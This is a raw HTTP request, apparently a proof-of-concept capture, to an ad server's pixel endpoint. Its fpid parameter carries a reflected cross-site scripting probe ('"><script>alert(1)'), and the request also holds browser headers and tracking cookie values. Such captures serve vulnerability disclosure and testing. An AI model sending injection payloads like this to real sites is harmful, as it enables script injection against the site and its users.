GET /server/pixel.htm?fpid=91fc2"><script>alert(1)< Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; adImpCount=-7D3jhve- |